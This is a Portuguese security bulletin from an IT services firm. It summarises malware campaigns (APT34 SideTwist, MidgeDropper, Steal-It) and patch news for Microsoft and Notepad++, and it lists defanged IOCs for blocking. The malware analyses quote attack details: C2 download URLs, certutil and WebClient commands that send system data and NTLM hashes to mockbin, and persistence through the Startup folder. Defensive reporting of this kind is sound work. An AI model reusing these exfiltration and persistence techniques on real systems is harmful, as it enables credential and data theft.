Notícias e Dicas de Correção e Postura de Segurança
Objetivo
Este documento foi desenvolvido e fundamentado utilizando as documentações oficiais do NIST (National Institute Of Standards and Technology), MITRE e CVE.org, que são conhecidas mundialmente na área de cibersegurança, como modelo e padronização de melhores práticas de segurança, pesquisa de metodologias de ataques e defesa cibernética, e pesquisa e catalogação de novas vulnerabilidades em sistemas operacionais e aplicações.
NIST: O instituto nacional possui uma divisão interna de segurança cibernética e segurança da informação que é responsável por informações sobre projetos, publicações, notícias e eventos relacionados à área. Suas pesquisas e padronizações atualmente norteiam as boas práticas adotadas na área de cibersegurança e SI.
MITRE: Uma base de conhecimento globalmente acessível de táticas e técnicas adversárias baseadas em observações do mundo real. A base de conhecimento da ATT&CK é usada pelo setor privado, governo e comunidades de produtos e serviços de segurança cibernética como base para o desenvolvimento de modelos e metodologias de ameaças específicas.
CVE.Org: Sua missão é identificar, definir e categorizar vulnerabilidades de segurança cibernética divulgadas publicamente. Cada vulnerabilidade no catálogo possui um registro CVE. As vulnerabilidades são descobertas, distribuídas e publicadas por organizações de todo o mundo.
Vulnerabilidade e Classificação CVE
O CVE define vulnerabilidade como “uma fraqueza na lógica computacional (por exemplo, código) encontrada em componentes de software e hardware que, quando explorada, resulta em um impacto negativo na confidencialidade, integridade ou disponibilidade. A mitigação das vulnerabilidades neste contexto normalmente envolve alterações de codificação, mas pode também incluem alterações de especificações ou mesmo descontinuações de especificações (por exemplo, remoção de protocolos ou funcionalidades afetadas em sua totalidade)”.
O objetivo principal do programa CVE (Common Vulnerabilities and Exposures) é identificar vulnerabilidades e associar versões específicas de bases de código a elas. O uso de CVEs garante que duas ou mais partes possam referir-se com segurança a um identificador (ID) CVE ao discutir ou compartilhar informações sobre uma vulnerabilidade única. Atualmente, existem aproximadamente 210.592 registros de CVEs publicados. Na Figura 1 é possível ver alguns dados sobre a quantidade de CVEs publicados no dia, na semana, mês, mês anterior e no ano até o momento.
Figura 1 – Painel NVD – CVES recebidos e processados
O CVSS (Common Vulnerability Scoring System) é uma estrutura que trata da comunicação das características e gravidade das vulnerabilidades de softwares. São pontuadas variando de 0 a 10, uma sequência vetorial considerando as métricas especificas e uma representação textual compactada dos valores utilizados para derivar essa pontuação. Na Figura 2 é possível ver um exemplo de Base Score de CVSS.
A representação textual da Base Score é definida em Critical, High, Medium e Low, como é possível ver na Figura 3. Para o cálculo do CVSS considera-se também impacto e exploração.
Ao avaliar o impacto, os analistas do CVSS devem considerar os privilégios que o invasor possui antes de explorar uma vulnerabilidade e compará-los com os privilégios que possuem após a exploração. A mudança nos privilégios é então capturada nas Métricas de Impacto, ou seja, Confidencialidade, Integridade e Disponibilidade.
É sempre importante destacar que o CVSS foi projetado e é utilizado para medir a gravidade de uma vulnerabilidade e não deve ser usado sozinho para avaliar riscos.
Vulnerabilidades descobertas
3.1. Grupo APT34 lança nova variante do Backdoor SideTwist em ataques de Phishing
Um novo ataque de phishing do APT34 foi detectado pelo NSFOCUS Security Labs. Nesta última campanha, os agentes do APT34 se passaram por GGMS, uma empresa de serviços de marketing, para direcionar e lançar ataques a entidades corporativas. Os invasores lançaram uma versão modificada do Trojan SideTwist para obter acesso prolongado e controle sobre o sistema host da vítima.
O APT34 é conhecido pela sua avançada tecnologia de ataque, que lhe permite desenvolver uma variedade de métodos de intrusão adaptados a diferentes alvos. O grupo também é capaz de conduzir ataques à cadeia de abastecimento. Um dos principais pontos fortes do APT34 é a sua capacidade de criar constantemente ferramentas e atualizar as existentes, minimizando os riscos de detecção e mantendo uma presença de longo prazo em hosts comprometidos.
O arquivo chamariz mais recente do APT34 é intitulado “GGMS Overview.doc”. O conteúdo do documento apresenta uma empresa chamada “Ganjavi Global Marketing Services” com uma descrição de suas capacidades no fornecimento de soluções de marketing em todo o mundo. Parece que os clientes-alvo da empresa são outros negócios.
Durante esta ocorrência específica, o APT34 utilizou uma metodologia de ataque que está em prática desde 2021, embora com algumas divergências nas especificidades. As fases primárias deste procedimento de ataque estão representadas na Figura 4.
O código malicioso oculto no arquivo de isca desempenha as funções do ambiente de implantação neste ataque. Este código recuperará o Trojan SystemFailureReporter.exe do documento, onde está codificado no formato base64, e o colocará na pasta %LOCALAPPDATA%\SystemFailureReporter\. Além disso, o código irá gerar um arquivo de texto chamado update.xml no mesmo diretório, servindo como chave de residência para o programa Trojan.
Uma tarefa agendada com o nome SystemFailureReporter é criada pela macro prejudicial. Essa tarefa convoca o Trojan a cada cinco minutos, permitindo que ele execute suas funções repetidamente.
O programa Trojan mais recente, conhecido como SystemFailureReporter.exe, é classificado como uma variante SideTwist, que é a principal ferramenta utilizada pelo APT34 em suas operações mais recentes. A comunicação é realizada via HTTP, embora o endereço C&C seja 11.0.188.38:443.
Após a conclusão da execução do Trojan, ele realizará um exame preliminar para determinar a presença de um arquivo idêntico chamado update.xml no mesmo diretório. Caso não seja encontrado, uma mensagem de depuração será transmitida pela porta de saída como medida preventiva contra sandboxing e outros mecanismos defensivos.
Após a execução bem-sucedida, o Trojan recuperará o nome do computador da vítima, o nome do domínio local e o nome de usuário. Utilizando essas informações, o Trojan construirá um hash exclusivo de 4 bytes para servir como identificação da vítima. A próxima etapa envolve a tentativa do Trojan de estabelecer uma conexão com o servidor C&C para que possa recuperar informações usando o ID recém-gerado da vítima.
O aspecto digno de nota do evento de ataque APT34 é a utilização do endereço IP 11.0.188.38 como C&C pelo Trojan SideTwist.
Atualmente, foi determinado que o serviço não é fornecido através da porta 443 do endereço IP. Além disso, o conteúdo fornecido pelo endereço IP não permite a confirmação da natureza do seu servidor C&C.
Após investigação da atribuição do endereço IP, descobriu-se que 11.0.188.38 havia sido alocado ao segmento 11.0.188.0/22, que pertence ao Centro de Informações de Rede do Departamento de Defesa dos Estados Unidos. Este segmento está situado em Columbus, Ohio, nos Estados Unidos, coincidindo com a localização física da agência.
Mitigação
Adicionar as seguintes IOCs a lista de bloqueios (não esqueça de substituir o hxxp por http e remover os []):
• 056378877c488af7894c8f6559550708
• 5e0b8bf38ad0d8c91310c7d6d8d7ad64
• http[:]//11.0.188[.]38:443/
Para ver mais detalhes sobre esta vulnerabilidade você pode acessar o endereço: https://nsfocusglobal.com/apt34-unleashes-new-wave-of-phishing-attack-with-variant-of-sidetwist-trojan/
3.2. Microsoft aborda Vulnerabilidades Críticas em atualização de Setembro
A Microsoft lançou em setembro um total de 61 novos patches que impactam uma ampla gama de produtos. A Microsoft corrigiu 61 CVEs em seu lançamento de terça-feira (12) de setembro, sendo 5 classificados como críticos, 55 como importantes e 1 como moderado. Entre essas CVEs foram identificadas 2 vulnerabilidades zeroday que foram categorizadas como importantes e estavam sendo ativamente alvo de invasores, que são: CVE-2023-36761 e CVE-2023-36802.
Os produtos atualizados incluem Microsoft Windows, Exchange Server, Office, Office Excel, Office Word, Office Outlook, Office SharePoint, .NET e Visual Studio, .NET Core & Visual Studio, .NET Framework, Azure Kubernetes Service, Azure DevOps, Azure HDInsights, Dynamics Finance & Operations, Windows Defender, Microsoft Streaming Service, Windows Codecs Library, 3D Builder, 3D Viewer, Visual Studio, Visual Studio Code, Windows Themes, Windows TCP/IP, Windows Scripting, Windows Kernel, Windows Internet Connection Sharing (ICS), Windows GDI, Windows DHCP Server, Microsoft Identity Linux Broker, Windows Cloud Files Mini Filter Driver, Windows Common Log File System Driver.
Na atualização, várias preocupações de terceiros também foram abordadas. Um desses problemas é uma vulnerabilidade de zeroday do Chromium que foi classificada como crítica, com potencial para impactar o Microsoft Edge.
Uma das vulnerabilidades zeroday é a CVE-2023-36761 que possui uma classificação de gravidade Média e pontuação CVSS v3: 6.2, pertence ao Microsoft Word. Esta vulnerabilidade específica foi categorizada como um problema de divulgação de informações. A exploração desta vulnerabilidade poderia permitir a divulgação de hashes NTLM. Esses hashes podem ser empregados em um ataque que segue um estilo de retransmissão NTLM.
A outra vulnerabilidade de zeroday é a CVE-2023-36802 que possui uma classificação de gravidade Alta e pontuação CVSS v3: 7.8, e pertence ao SO Windows. Esta foi categorizada como vulnerabilidade de elevação de privilégio do proxy do serviço de streaming da Microsoft.
Um invasor que a explorar com êxito poderá obter privilégios de SYSTEM. Para conseguir uma violação bem-sucedida, o agressor deve executar um programa que foi meticulosamente concebido para permitir a escalada de privilégios.
Mitigação
A Microsoft aconselhou todos os usuários atualizarem os patchs de segurança de setembro, pois entre eles estão a correção de vulnerabilidades que possibilitam Remote Code Execution (39,3%), e de Elevation of Privilege (27,9%). Mas, em especial os patchs de segurança das duas CVEs zeroday listados a seguir:
• https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36802
• https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36761
Para ver mais detalhes sobre esta vulnerabilidade você pode acessar o endereço: https://boletimsec.com.br/microsoft-aborda-vulnerabilidades-criticas-em-atualizacao-de-setembro/
3.3. Nova variante do Malware MidgeDropper é descoberta
O MidgeDropper, uma variação do dropper até então desconhecida, tem uma cadeia de infecção complicada que envolve ofuscação de código e carregamento lateral. Embora o método exato de infecção inicial não tenha sido completamente descoberto pela Fortiguard Labs, é provável que tenha sido através de um e-mail de phishing. Isso se deve ao fato de que um arquivo RAR chamado “!PENTING_LIST OF OFFICERS.rar” foi descoberto e que aparentemente indica ser um anexo de um e-mail.
Contidos neste documento estão dois arquivos distintos: um documento PDF intitulado “Notice to Work-From-Home groups.pdf”, que deve ser usado como uma isca, e um arquivo executável designado como “062023_PENTING_LIST OF SUPERVISORY OFFICERS WHO YET DON ‘T HAVE A REPORT.pdf.exe”, conforme representado na Figura 5.
O documento intitulado “Notice to Work-From-Home groups.pdf” é um arquivo em formato PDF, que ao ser aberto aparece uma imagem que aparece como uma mensagem de erro, indicando que o documento não foi carregado com sucesso. No entanto, é uma armadilha projetada para enganar o destinatário e ativar o arquivo denominado “062023_PENTING_LIST OF SUPERVISORY OFFICERS WHO HEVE NOT REPORT.pdf.exe”. Os sistemas operacionais Windows ocultam as extensões de arquivo por padrão, tornando improvável que o revisor perceba a extensão “.exe” e presuma que está abrindo um arquivo PDF.
O tamanho do arquivo “062023_PENTING_LIST OF SUPERVISORY OFFICERS WHO YET NOT REPORT.pdf.exe” é notavelmente grande para fins de entrega de malware, chegando a 6,7 MB. Este executável específico funciona principalmente como um dropper para estágios posteriores da infecção. Os arquivos descartados incluem “Microsoft Office.doc”, “IC.exe”,
“power.exe” e “power.xml”. Além disso, ele se conecta ao endereço “hXXp://185[.]225[.]68[.]37/jay/nl/seAgnt.exe” para baixar o arquivo “seAgnt.exe”.
O arquivo denominado “Microsoft.doc” é carregado e acessado no diretório “C:\Users\<usuário>\AppData\Local\Temp\Microsoft\Office”. Seu objetivo é atuar como uma pista falsa. Embora esteja presente em certas iterações do dropper, foi considerado inofensivo e sem conteúdo na versão avaliada pelo FortiGuard Labs.
O malware conhecido como “062023_PENTING_LIST OF SUPERVISORY OFFICERS WHO STILL HAVE NOT REPORT.pdf.exe” é responsável por excluir o arquivo “IC.exe” e colocá-lo no diretório “C:\ProgramData\Emisoft\Microsoft\Stream\IC.exe”. O objetivo desta ação é permitir a próxima etapa do processo de infecção. O malware então acessa o endereço “185[.]225[.]68[. ]37” para baixar um arquivo suplementar chamado “VCRUNTIME140_1.dll”.
O arquivo ”062023_PENTING_LIST OF SUPERVISORY OFFICERS WHO STILL HAVE NOT REPORT.pdf.exe”” também serve para chamar e excluir o “power.exe” e o “power.xml”. A única função de “power.exe” é decifrar e realizar operações em “power.xml”. Em sua forma original, “power.xml” torna-se ilegível devido a táticas de ofuscação, entretanto, para ver seu conteúdo basta eliminar os caracteres estranhos usados para esse propósito.
Depois de eliminar os elementos confusos, o que resta é um documento XML. A maioria dos conteúdos são estranhos, com exceção do último segmento localizado na tag “Actions”. O objetivo principal deste conjunto de arquivos é iniciar a execução de “seAgnt.exe.
O “Xbox Game Bar Full Trust COM Server” é na verdade uma versão renomeada do aplicativo “GameBarFTServer.exe” da Microsoft, ambas cópias idênticas um do outro. O “seAgnt.exe” é um processo em segundo plano que opera em conjunto com a Barra de Jogo Xbox no Windows. Embora o processo em si não seja prejudicial, sua funcionalidade depende da presença de “VCRUNTIME140_1.dll”. Esta dependência de DLL permite a execução de qualquer código malicioso contido nela.
O pacote de tempo de execução do Microsoft Visual C++ contém uma DLL válida conhecida como “VCRUNTIME140_1.dll”. No entanto, neste cenário específico, a versão utilizada não é benigna e foi corrompida com intenções maliciosas.
A biblioteca de link dinâmico “VCRUNTIME140_1.dll” não existe de forma independente como um executável. Desta forma, necessita da ajuda de outro programa para carregar seu código na memória e executá-lo, no caso o “seAgnt.exe” faz este papel. Ele utiliza uma tática conhecida como sideload, por meio da qual a dependência de um aplicativo legítimo é sequestrada para facilitar o carregamento do código malicioso. O arquivo em questão foi intencionalmente ofuscado e projetado propositalmente para impedir a análise. Esta característica é compartilhada por todos os outros componentes do dropper.
O objetivo principal deste código prejudicial pode ser determinado como uma tentativa de acessar o URL “hXXp://185[.]225[.]68[. ]37/jay/nl/35g3498734gkb.dat” para efetuar o download do arquivo “35g3498734gkb.dat”. Curiosamente, este arquivo é uma cópia exata de “VCRUNTIME140_1.dll”, inclusive os dois possuem o mesmo hash. A razão pela qual o perpetrador optou por baixar o arquivo novamente do servidor de C&C não foi identificada pela Fortiguard Labs. Durante a análise, arquivos adicionais foram removidos, o que interrompeu qualquer exame futuro das possíveis acusações finais.
Mitigação
É importante que que sejam habilitadas proteções como Filtro de Web e no Antivírus verificar se há proteções contra as ameaças “MalwThreat!caa0FT” e “W32/Agente.9CDF!tr”, que foram as encontradas na pesquisa e protegem contra este dropper.
Adicionar os seguintes hashes e URLS C&C a sua lista de bloqueios (não esqueça de substituir o hxxp por http e remover os []):
IOCs baseados em arquivo:
IOCs baseados em rede:
Para ver mais detalhes sobre esta vulnerabilidade você pode acessar o endereço: https://www.fortinet.com/blog/threat-research/new-midgedropper-variant
3.4. Campanhas de Phishing usando PowerShell para roubar Hashes NTLMv2 de Windows comprometidos
Uma nova campanha chamada “Steal-It” foi exposta pelo Zscaler ThreatLabz. Durante esta campanha, os agentes da ameaça roubaram e removeram hashes NTLMv2 por meio de adaptações personalizadas do script Start-CaptureServer PowerShell de Nishang. Eles então executaram uma série de comandos do sistema e usaram APIs Mockbin para remover os dados obtidos.
Nossa equipe realizou um exame minucioso de cargas maliciosas e descobriu que a campanha havia implementado uma tática de geofencing, com ênfase particular na Austrália, na Polônia e na Bélgica, por enquanto. Suas operações foram executadas por meio de scripts PowerShell criados para roubar hashes NTLM vitais, que foram posteriormente enviados para a plataforma Mockbin. Para iniciar a campanha, os arquivos LNK foram ocultados em arquivos zip e estrategicamente colocados na pasta StartUp para garantir a persistência no sistema. Além disso, APIs Mockbin foram usadas para exfiltrar dados do sistema e hashes NTMLv2.
Zscaler estudou meticulosamente vários exemplos da iniciativa Steal-It e conseguiu classificar as cadeias de infecção de acordo com as diferenças detectadas em táticas, técnicas e procedimentos (TTPs). Assim, embora todos usem e-mails de phishing contendo arquivos ZIP como o ponto de partida para infiltrar alvos específicos usando técnicas de geofencing, ficaram dívidas nas seguintes cadeias de infecção:
Cadeia de infecção para roubo de hash NTLMv2: que emprega uma versão personalizada do script PowerShell Start-CaptureServer para coletar hashes NTLMv2:
O processo de roubo de hashes NTLMv2 envolve uma versão personalizada do script Start-CaptureServer PowerShell da Nishang que é adaptada às necessidades específicas da cadeia de infecção de roubo de hash NTLMv2. Os hashes roubados são então transmitidos através de APIs falsas para o Mockbin. Assim, o processo de propagação começa com um arquivo ZIP compactado que contém um arquivo LNK (atalho) malévolo. Este arquivo LNK é instruído a recuperar e executar um script PowerShell diferente dos sites mockbin[.]org e webhook[.] conforme mostrado na Figura 6. O script PowerShell executado pelo arquivo LNK malicioso é uma versão personalizada do script Start-CaptureServer.ps1 de Nishang que foi especialmente desenvolvido para capturar hashes NTLMv2.
O script Start-CaptureServer.ps1 foi modificado pelos agentes da ameaça, que tomaram medidas para remover todos os comentários, strings que poderiam ser facilmente detectados e mecanismos básicos de autenticação que poderiam comprometer sua capacidade de capturar credenciais. A mudança mais significativa observada é que os hashes NTLMv2 codificados em base64 capturados são exfiltrados invocando a função Net.WebClient.DownloadString( ) com a URL “https[:]//mockbin.org/bin/ <id>” como argumento.
Após a execução da função DownloadString(), ela inicia uma solicitação GET para uma URL específica em mockbin.org. Esta plataforma oferece a capacidade de criar endpoints personalizados para fins de teste, monitoramento e simulação de várias solicitações e respostas HTTP em diferentes soquetes, APIs e bibliotecas. Quando uma solicitação GET é feita para o URL designado no Mockbin e inclui um hash NTMLv2 codificado em base64, o servidor registra a solicitação e ela pode ser monitorada por possíveis agentes de ameaças.
SystemInfo roubando cadeia de infecção: a cadeia de infecção de roubo Systeminfo usa a marca OnlyFans para motivar os usuários a baixar os estágios posteriores da cadeia, que exfiltram as saídas de comando para o Mockbin;
A cadeia desta infecção começa com uma pasta ZIP compactada chamada “best_tits.zip” e um arquivo LNK maliciosoo denominado onlyfans.com-1.lnk. Ao abrir o arquivo LNK, é executado um comando que inicia o navegador Microsoft Edge, com um argumento codificado em base64. Este argumento é uma linha solitária de JavaScript que redireciona para o endereço da web http://run[.]mocky[.]io/v3/<id> através do uso de location.href.
Para ocultar seu redirecionamento malicioso, o comando inicia simultaneamente o site legítimo OnlyFans em uma nova guia do navegador e depois faz uma pausa de 9 segundos. O URL aberto do domínio “run[.]mocky[.]io” contém uma página HTML com código JavaScript
quinta-feira, 15 de setembro de 2023 – Página 10 de 16
Service IT – www.service.com.br
Classificação: Público
prejudicial que executa uma série de ações. Essas ações verificam se o cabeçalho userAgent contém a palavra-chave “win” para verificar o sistema operacional. O código também utiliza a API de geolocalização IPAPI para verificar se o código do país é “AU” (Austrália), inicialmente. Depois que essas verificações são concluídas, o código prossegue para baixar um blob de dados codificado em base64, que é usado para decodificar outro arquivo LNK malicioso chamado “m8.lnk”. Este arquivo baixado é então copiado para a pasta de Inicialização conforme especificado no argumento do arquivo LNK: move /y %userprofile%\Downloads\m8 m8.lnk. Como o arquivo LNK anterior definiu o diretório de trabalho para o caminho da pasta Inicialização, o arquivo m8.lnk é copiado automaticamente para a pasta Inicialização. Isso concede persistência ao arquivo m8.lnk e garante que ele será executado sempre que o sistema for reiniciado.
Depois que o arquivo LNK baixado m8.lnk é executado, ele baixa um arquivo CMD de run[.]mocky[.]io e o copia para a pasta Inicializar da mesma maneira que o arquivo LNK anterior. O arquivo CMD, denominado m8.cmd, será executado na reinicialização do sistema e é responsável por coletar e exfiltrar informações do sistema. Este script final é iniciado executando três comandos do sistema – ipconfig, systeminfo e tasklist – e armazena a saída no diretório ProgramData. Em seguida, o script base64 codifica os arquivos de saída de comando usando CertUtil e define variáveis de ambiente para as saídas de comando codificadas em base64 usando set /p ipc=<%programdata%\<b64enc_cmdoutput>. Variáveis de ambiente recém-definidas são exfiltradas por meio da solicitação GET para mockbin[.]org usando certutil -urlcache -f <http[:]//mockbin[.]org/bin/<id>/%env_var% com as variáveis de ambiente sendo passadas no pedido. No final do script, os arquivos de saída do comando são excluídos e as saídas dos comandos executados: ipconfig, systeminfo, tasklist, são exfiltradas para a URL do Mockbin.
Cadeia de infecção Fansly Whoami Exfil: usa a marca Fansly para motivar os usuários a baixar os estágios posteriores da cadeia, que exfiltram as saídas de comando para o Mockbin;
O processo começa com um arquivo ZIP compactado que vem com um arquivo LNK contendo malware. Quando executado, o arquivo LNK direciona o usuário para uma URL específica, http://run[.]mocky[.]io/v3/<id>, que consiste em uma página HTML que contém Javascript malicioso. Esta página HTML difere daquela detalhada na seção “Systeminfo roubando cadeia de infecção”. Neste caso, o código Javascript verifica o sistema operacional verificando o cabeçalho userAgent em busca da palavra-chave “win”. Em seguida, a API de geolocalização IPAPI é empregada para determinar se o código do país é “PL” (Polônia), inicialmente, e se a versão do endereço IP é “ipv4”. Posteriormente, um grande blob base64 é decodificado do arquivo ZIP baixado chamado fansly.zip. O arquivo ZIP contém três imagens JPEG explícitas de modelos Fansly da Ucrânia e da Rússia para motivar os usuários a baixar um arquivo em lote malicioso chamado fansly.com_online.bat, que também está incluído no mesmo arquivo ZIP compactado.
Após a execução, o script em lote conhecido como fansly.com_online.cmd realiza diversas ações maliciosas. Primeiramente, ele cria um VBScript e um script em lote no diretório ProgramData e executa o VBScript. Em seguida, oculta suas atividades prejudiciais abrindo perfis legítimos de modelos Fansly reais. Em seguida, ele executa o script em lote do diretório ProgramData. O script em lote encerra qualquer processo msedge.exe em execução, remove todos os arquivos .css da pasta de downloads e baixa um arquivo chamado “eucv8o.css” de um URL mockbin[.]org para a pasta de downloads. Este arquivo é então movido para o diretório ProgramData como “eucv8o.cmd”. Finalmente, o script em lote elimina o processo msedge.exe, recupera a saída do comando “whoami”, armazena-a no diretório ProgramData como a variável de ambiente dobpyk e exfiltra a saída para mockbin[.]org/bin/<id> /<cmd_output> por meio de uma solicitação GET.>.
Cadeia de infecção Exfil do Windows Update: usa um arquivo ZIP empacotado com um arquivo LNK que utiliza técnicas de geofencing para atingir usuários e, sem saber, baixando vários estágios de um script do PowerShell, que são falsos arquivos de atualização do Windows projetados para rodar comandos como “tasklist” e “systeminfo”, para coletar informações básicas para fins maliciosos.
O vetor inicial nesta cadeia de infecção é um arquivo LNK malicioso incluído em um arquivo ZIP (por exemplo, command_powershell.zip). Depois de aberto, o arquivo LNK faz com que o Microsoft Edge acesse a URL run[.]mocky[. ]io. Isso resulta no download de um arquivo c1 na pasta Downloads, que é então movido para a pasta Inicialização com o nome c1.bat. Isso é feito para garantir a persistência na máquina, para que c1.bat seja executado toda vez que o sistema for reiniciado. A URL run[.]mocky[.]io após ser acessada, aciona a execução do código JavaScript que baixa um script em lote de um blob codificado em base64. Esse script em lote também é baixado na pasta Downloads, onde é renomeado para c1.bat e movido para a pasta Inicialização. O script c1.bat é intitulado “Window Update”, igual ao assunto do e-mail phishing, e foi projetado para baixar outro script run[.]mocky[.]io no diretório ProgramData usando CertUtil. Para ocultar qualquer atividade maliciosa, o script em lote exibe uma mensagem no console que parece inocente, junto com uma barra de progresso. A mensagem diz: “Atualização dinâmica para sistemas Windows (KB5021043).
Utilizando o arquivo LNK, o Microsoft Edge abre uma URL de run[.]mocky[.]io, que então realiza verificações no cabeçalho userAgent, procurando especificamente pela palavra “edg” para confirmar se o navegador usado é “Microsoft Edge”. Além disso, a API de geolocalização IPAPI é utilizada para verificar se o código do país é “BE” (Bélgica), inicialmente. Uma vez confirmado, o processo de download começa utilizando um blob base64 que é decodificado e salvo na pasta Downloads. Este script é então realocado para a pasta Inicialização e renomeado como b4.cmd. Isto é feito para ajudar a manter a persistência, que é uma característica comum entre várias cadeias de infecção. Assim que a execução for concluída, o script b4.cmd abre outra URL run[.]mocky[.]io usando o Microsoft Edge que contém código semelhante ao JavaScript. Este código executa o script em lote com o título “Windows Update” e exibe um ícone de mensagem no console com uma barra de progresso que indica: “Atualização dinâmica para sistemas Windows (KB5021043)”. A partir deste ponto, outro script é baixado de run[.]mocky[.]io no diretório ProgramData usando CertUtil para executa-lo. O script foi projetado para mascarar suas verdadeiras intenções, rotulando o título do Windows como “Atualizando o Windows” e exibindo uma mensagem dizendo “Atualização Cumulativa Dinâmica para Windows (KB5023696)”. Esta técnica foi relatada anteriormente como um meio de ocultar atividades maliciosas.
A sequência final de comandos do PowerShell neste script envolve a execução dos comandos “lista de tarefas” e “systeminfo” no sistema. Em seguida, ele utiliza “WebClient.UploadString()” para exfiltrar a saída do comando para o URL mockbin[.]org por meio de uma solicitação POST. Além disso, detectamos casos em que todo o caminho do arquivo foi exfiltrado para para mockbin[.]org. Isso foi feito executando o comando “Get-ChildItem -Path <path> -Recurse -File | select FullName” e use “WebClient.UploadString.
Mapeamento MITRE ATT&CK TTP para estas ameaças de cadeias de infecção
Mitigação
Adicionar as seguintes IOCs a lista de bloqueios (não esqueça de substituir o hxxp por http e remover os []):
• 022d01e7007971f5a5096c4f2f2b2aa4
• 1e2a320658ba5b616eae7a3e247f44a6
• 358d9271b8e207e82dafe6ea67c1d198
• 4083396ab0344c4731a30d4931bb1963
• 02af0a334507fcdf7b374dff90eddead
• 468afeebde1c65b96e6d10e11428598e
• c95eed189823c9a2c7206d13ff953bdf
Adicionar as seguintes URLS C&C a sua lista de bloqueios (não esqueça de substituir o hxxp por http e remover os []):
• URL: mockbin[.]org/bin/de22e2a8-d2af-4675-b70f-e42f1577da6e
• https[:]//webhook[.]site/33128548-0eda-4e2b-bf89-7b1b225ecb9f
• http[:]//executar[.]mocky[.]io/v3/cee6d18e-5adb-4fbd-b47b-989768473c66
• http[:]//executar[.]mocky[.]io/v3/99c677eb-21e1-4064-9ab4-9ee9dfd2ef13
• https[:]//run.mocky.io/v3/869e530a-51f7-4bec-ae6e-3effb1737691
• https[:]//run.mocky.io/v3/f4ccbf43-9f2a-4c08-af0a-35be079694a8
• http[:]//executar[.]mocky[.]io/v3/2e757b51-c023-4bb6-9d3f-68489571abd7
• https[:]//executar[.]mocky[.]io/v3/e0687bb8-d14b-4ee0-8c47-202c5aaab48c
• http[:]//executar[.]mocky[.]io/v3/ef2c9f34-11f5-4a99-b31c-6b203b5d5313
Para ver mais detalhes sobre esta vulnerabilidade você pode acessar o endereço: https://www.zscaler.com/blogs/security-research/steal-it-campaign
3.5. Notepad++ lança correção para múltiplas vulnerabilidades de segurança
A versão 8.5.7 do Notepad++ foi lançada recentemente e contém soluções para vários problemas de dia zero. Um desses problemas pode permitir que hackers executem códigos enganando os usuários para que abram arquivos que foram criados especificamente para essa finalidade.
Notepad++ é um editor de código-fonte amplamente utilizado e gratuito. É capaz de suportar uma infinidade de linguagens de programação e pode ser expandido por meio de plug-ins. Além disso, é equipado com recursos que aumentam a produtividade, como edição em várias guias e realce de sintaxe.
Nos últimos meses, Jaroslav Lobacevski, pesquisador de segurança do GitHub, notificou os desenvolvedores do Notepad++ versão 8.5.2 sobre suas vulnerabilidades. O pesquisador tornou públicas provas de conceito dessas vulnerabilidades, ressaltando a importância da atualização imediata do programa. O mais grave desses problemas é o CVE-2023-40031, que pode resultar na execução de código arbitrário. Portanto, os usuários devem estar atentos e atualizar seu software o mais rápido possível.
Ao abrir um arquivo criado, os CVEs descobertos por Buffer Overflows no Notepad++ (especificamente, CVE-2023-40031, CVE-2023-40036, CVE-2023-40164 e CVE-2023-40166) fazem com que o sistema leia e grave além o limite do buffer.
CVE-2023-40031, que possui uma classificação de gravidade Alta e pontuação CVSS v3: 7.8
O primeiro problema em questão diz respeito a um estouro de gravação do buffer de heap na função Utf8_16_Read::convert. Esta função específica é responsável por alocar um novo buffer [1] que é usado para converter UTF16 em UTF8. Durante o cálculo do tamanho do novo buffer, assume-se que, no máximo, três bytes UTF8 podem ser necessários para cada dois bytes de entrada codificados em UTF16 [2]. Porém, no caso em que o comprimento da entrada for um número ímpar de bytes malformados, o cálculo será desabilitado. Esse problema específico pode resultar na execução de código arbitrário.
CVE-2023-40036, que possui uma classificação de gravidade Média e pontuação CVSS v3: 5.5
O segunda problema diz respeito ao estouro de leituras de buffer global na função conhecida como CharDistributionAnalysis::HandleOneChar. O Notepad++ implementa uma versão distinta da biblioteca uchardet. O ato de criar um arquivo resulta na capacidade de leitura além dos limites estabelecidos de um buffer de objeto que foi alocado globalmente durante o processo de abertura do arquivo. Até que ponto esta questão pode ser explorada permanece incerta. É possível que esta vulnerabilidade possa ser usada para obter acesso não autorizado.
CVE-2023-40164, que possui uma classificação de gravidade Média e pontuação CVSS v3: 5.5
O terceiro problema em questão refere-se a um estouro de leitura de buffer global dentro do nsCodingStateMachine::, que é um componente técnico do software Notepad++. Especificamente, o programa utiliza uma versão separada da uchardetbiblioteca. Quando um arquivo é criado neste contexto, ele tem o potencial de ler além dos limites de buffer alocados de um buffer de objeto designado globalmente, o que é problemático. Embora o grau de exploração para esta situação não seja claro, existe um potencial para que ela seja utilizada no vazamento de informações confidenciais de alocação de memória interna.
CVE-2023-40166, que possui uma classificação de gravidade Média e pontuação CVSS v3: 5.5
O quarto prolema refe-se a estouro de leitura do buffer de heap em FileManager::detectLanguageFromTextBegining. No Notepad++, quando FileManager::loadFile é chamado, um buffer com um tamanho predeterminado é alocado. FileManager::loadFileData preenche o buffer com o bloco inicial de dados [1] e continua chamando detectLanguageFromTextBegining para identificar o tipo de conteúdo do arquivo desde o início [2]. O ponteiro de dados é então avançado por FileManager::detectLanguageFromTextBegining até que um caractere sem espaço seja detectado ou o parâmetro lenFile seja alcançado [3]. Se este for o caso, o código lê 32 bytes (40 – 8, que é o preenchimento extra adicionado para caracteres multibyte incompletos) além do final do databuffer [4]. Não está claro até que ponto esse problema pode ser explorado, mas é possível que ele possa ser explorado para revelar informações de alocação de memória interna.
Embora o blog e as provas de conceito de Jaroslav Lobacevski tenham sido disponibilizados em 21 de agosto de 2023, a equipe de desenvolvimento do Notepad++ não agiu imediatamente até que a comunidade de usuários assim o exigisse. Em 30 de agosto de 2023, foi levantada questão pública para reconhecer o problema. As correções para as quatro imperfeições foram posteriormente integradas ao ramo do código primário em 3 de setembro de 2023.
Mitigação
Atualizar para a versão 8.5.7 do Notepad++ que contém as soluções para as CVEs listadas. Link de Download: https://notepad-plus-plus.org/downloads/v8.5.7/
Para ver mais detalhes sobre como esta vulnerabilidade você pode acessar o endereço: https://securitylab.github.com/advisories/GHSL-2023-092_Notepad__/
3.6. GitHub enfrenta vulnerabilidade crítica que expõe repositórios ao repojacking
